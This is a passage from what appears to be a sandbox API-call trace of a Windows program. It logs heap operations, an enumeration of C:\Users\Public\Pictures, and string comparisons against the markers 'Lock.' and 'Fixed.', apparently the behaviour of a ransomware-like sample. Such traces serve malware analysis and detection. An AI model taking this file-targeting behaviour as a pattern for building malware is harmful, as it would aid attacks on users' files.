(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0267.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0267.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.734] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0267.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9) returned 0x34aa280 [0267.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x34aa280, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0267.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x52) returned 0x249a840 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0267.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x19) returned 0x24b3c68 [0267.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x24b3c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Pictures", lpUsedDefaultChar=0x0) returned 25 [0267.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0267.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x32) returned 0x246d6e0 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0267.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0267.737] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b3c68, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x32) returned 0x246d720 [0267.737] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b3c68, cbMultiByte=25, lpWideCharStr=0x246d720, cchWideChar=25 | out: lpWideCharStr="C:\\Users\\Public\\Pictures") returned 25 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.737] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.738] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.738] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.739] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.739] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa40536, dwReserved1=0x40, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0267.739] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa40536, dwReserved1=0x40, cFileName="..", cAlternateFileName="")) returned 1 [0267.739] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa40536, dwReserved1=0x40, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0267.739] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aa880, dwReserved1=0x25c6e50, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1198, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d790, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x34aa7d8, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x28c5\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\xa3e8\x34a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.740] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0267.741] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.741] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.741] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.741] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.741] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.742] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.742] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.742] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0267.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x2420898 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 